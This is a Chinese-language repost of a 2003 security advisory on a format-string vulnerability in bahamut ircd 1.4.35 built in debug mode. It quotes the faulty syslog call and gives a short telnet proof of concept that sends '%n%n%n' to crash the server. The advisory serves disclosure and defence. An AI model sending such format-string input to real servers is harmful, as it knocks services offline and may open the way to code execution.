当前位置：首页 » 服务器技术

开发技术指南» 文章正文

    引言： 信息提供：安全公告（或线索）提供热线：51cto.editor@

 

 

Bahamut IRCd远程格式串处理漏洞

【程序编程相关:CDE DTPrintInfo Home】

【推荐阅读:Sun Solaris tracerou】

信息提供: 【扩展信息:Sun Solaris XSun直接图形】

安全公告（或线索）提供热线:51cto.editor@gmail.com

漏洞类别:

设计错误

攻击类型:

拒绝服务攻击

发布日期:

2003-06-28

更新日期:

2003-07-04

受影响系统:

bahamut ircd 1.4.35

安全系统:

无

漏洞报告人:

anonymous 0xbadc0ded.org affiliate.

漏洞描述:

bugtraq  id: 8038

bahamut ircd是一款流行的ircd服务程序,是dalnet正式irc守护程序.

bahamut ircd存在格式串处理问题,远程攻击者可以利用这个漏洞可能以ircd进程权限在系统上执行任意指令.

当behamut以debugmode方式编译时存在此漏洞,有问题的代码存在于src/s_debug.c:

      if (level == debug_error)

          syslog(log_err, debugbuf);

攻击者只要简单的连接服务器,发送几个格式字符串如'%n',服务器就会由于尝试数据到非法地址而引起段错误,造成拒绝服务,精心构建提交格式串,可能以ircd进程权限在系统上执行任意指令.

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.使用者风险自负！

[je@vudo ~]$ telnet 127.0.0.1 6667

    trying 127.0.0.1...

    connected to 127.0.0.1.

    escape character is '^]'.

    :server.dal.net notice auth :*** looking up your hostname...

    :server.dal.net notice auth :*** checking ident

    :server.dal.net notice auth :*** found your hostname

    :server.dal.net notice auth :*** no ident response

    %n%n%n

    connection closed by foreign host.

...   下一页

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：